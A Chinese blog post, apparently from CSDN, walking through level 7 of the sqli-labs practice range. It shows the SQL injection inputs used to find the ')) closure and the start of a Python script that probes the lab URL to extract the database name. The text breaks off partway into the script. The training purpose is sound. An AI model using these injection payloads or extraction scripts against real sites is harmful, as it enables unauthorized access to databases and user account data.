sqli-labs靶场第七关

沧海一粟@星火燎原

于 2024-01-28 00:02:32 发布

阅读量698

点赞数 1

文章标签：数据库 oracle

本文链接：https://blog.youkuaiyun.com/lyy8910599download/article/details/135889586

版权

文章描述了一个利用SQL注入技术的脚本，通过构造URL并发送请求，逐步获取数据库名、表名、字段名以及用户账号信息的过程。

摘要生成于 C知道，由 DeepSeek-R1 满血版支持，前往体验 >

7、第七关

id=1' --+单引号报错,id=1" --+双引号不报错,可以判断是单引号闭合

id=1') --+也报错，尝试两个括号闭合，id=1')) --+不报错

接下来用脚本爆库

import string

import requests

numbers = [1, 2, 3, 4, 5, 6, 7, 8, 9, 0]
letters2 = list(string.ascii_lowercase)
fuhao = ['~', "@", "$", "^", "*", "(", ")", "-", "_", ",", ".", "/", "{", "}", "[", "]", ":", ";", "|"]

if __name__ == '__main__':
    test = False
    url = "http://sqli.labs/Less-7/?id=1%27))%20"
    if te